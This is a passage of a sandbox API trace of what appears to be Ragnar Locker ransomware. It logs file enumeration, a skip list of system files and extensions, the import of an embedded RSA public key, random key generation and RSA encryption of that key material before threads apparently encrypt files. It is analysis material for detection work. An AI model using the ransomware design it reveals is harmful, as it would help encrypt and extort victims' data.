lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0176.846] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0176.846] FindNextFileW (in: hFindFile=0x3547b80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6be0447, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf6be0447, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0176.846] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0176.846] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0176.846] FindNextFileW (in: hFindFile=0x3547b80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0176.846] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0176.846] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0176.846] FindNextFileW (in: hFindFile=0x3547b80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0176.846] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0176.846] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0176.846] FindNextFileW (in: hFindFile=0x3547b80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0176.846] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0176.846] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0176.846] FindNextFileW (in: hFindFile=0x3547b80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0176.846] FindClose (in: hFindFile=0x3547b80 | out: hFindFile=0x3547b80) returned 1 [0176.848] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547ac0 [0176.848] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf6be0447, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf6be0447, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.849] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6be0447, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf6be0447, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0176.849] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.849] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0176.849] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0176.849] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0176.850] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0176.850] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.850] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0176.850] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned=".rtf" [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0176.850] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0176.850] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0176.850] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0176.850] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0176.850] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0176.851] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0176.851] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0176.851] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0176.851] GetProcessHeap () returned 0x3520000 [0176.851] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0176.852] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" [0176.852] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0176.852] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.852] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0176.852] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned=".xml" [0176.852] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.852] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0176.852] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0176.852] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0176.852] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0176.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0176.853] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0176.853] GetProcessHeap () returned 0x3520000 [0176.853] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0176.854] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0176.855] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0176.855] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\2052\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0176.855] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0176.855] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned=".dll" [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0176.855] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0176.855] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0176.855] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0176.855] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0176.855] FindNextFileW (in: hFindFile=0x3547ac0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0176.855] GetProcessHeap () returned 0x3520000 [0176.856] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586aa0 [0176.856] CryptAcquireContextW (in: phProv=0x3586aa0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586aa0*=0x5d26388) returned 1 [0176.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0176.856] GetProcessHeap () returned 0x3520000 [0176.856] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358ee28 [0176.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358ee28, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0176.857] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0176.857] GetProcessHeap () returned 0x3520000 [0176.857] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0176.857] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0176.857] GetProcessHeap () returned 0x3520000 [0176.857] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358ee28 | out: hHeap=0x3520000) returned 1 [0176.857] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0176.857] CryptImportPublicKeyInfo (in: hCryptProv=0x5d26388, dwCertEncodingType=0x1, pInfo=0x35c9eb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x35c9ee8*, PublicKey.cbData=0x10e, PublicKey.pbData=0x35c9ef0*, PublicKey.cUnusedBits=0x0), phKey=0x3586aa4 | out: phKey=0x3586aa4*=0x3547b00) returned 1 [0176.857] GetProcessHeap () returned 0x3520000 [0176.857] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0176.857] LocalFree (hMem=0x35c9eb8) returned 0x0 [0176.857] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26b80) returned 1 [0176.858] CryptGenRandom (in: hProv=0x5d26b80, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0176.858] CryptReleaseContext (hProv=0x5d26b80, dwFlags=0x0) returned 1 [0176.858] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0176.861] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26eb0) returned 1 [0176.862] CryptGenRandom (in: hProv=0x5d26eb0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0176.862] CryptReleaseContext (hProv=0x5d26eb0, dwFlags=0x0) returned 1 [0176.862] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0176.864] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26af8) returned 1 [0176.865] CryptGenRandom (in: hProv=0x5d26af8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0176.865] CryptReleaseContext (hProv=0x5d26af8, dwFlags=0x0) returned 1 [0176.865] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0176.932] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26300) returned 1 [0176.932] CryptGenRandom (in: hProv=0x5d26300, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0176.932] CryptReleaseContext (hProv=0x5d26300, dwFlags=0x0) returned 1 [0176.933] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0176.935] CryptEncrypt (in: hKey=0x3547b00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.936] GetLastError () returned 0x80090016 [0176.936] CryptEncrypt (in: hKey=0x3547b00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.936] GetLastError () returned 0x80090016 [0176.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x137c) returned 0x3b4 [0176.937] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d26520) returned 1 [0176.938] CryptGenRandom (in: hProv=0x5d26520, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0176.938] CryptReleaseContext (hProv=0x5d26520, dwFlags=0x0) returned 1 [0176.938] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0176.941] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26eb0) returned 1 [0176.941] CryptGenRandom (in: hProv=0x5d26eb0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0176.941] CryptReleaseContext (hProv=0x5d26eb0, dwFlags=0x0) returned 1 [0176.941] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0176.944] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d26630) returned 1 [0176.945] CryptGenRandom (in: hProv=0x5d26630, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0176.945] CryptReleaseContext (hProv=0x5d26630, dwFlags=0x0) returned 1 [0176.945] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0176.947] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26fc0) returned 1 [0176.948] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0176.948] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0176.948] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0176.950] CryptEncrypt (in: hKey=0x3547b00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.951] GetLastError () returned 0x80090016 [0176.951] CryptEncrypt (in: hKey=0x3547b00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0176.951] GetLastError () returned 0x80090016 [0176.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x1174) returned 0x3f0 [0176.952] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0177.418] GetProcessHeap () returned 0x3520000 [0177.418] HeapFree (in: hHeap=0x3520000, 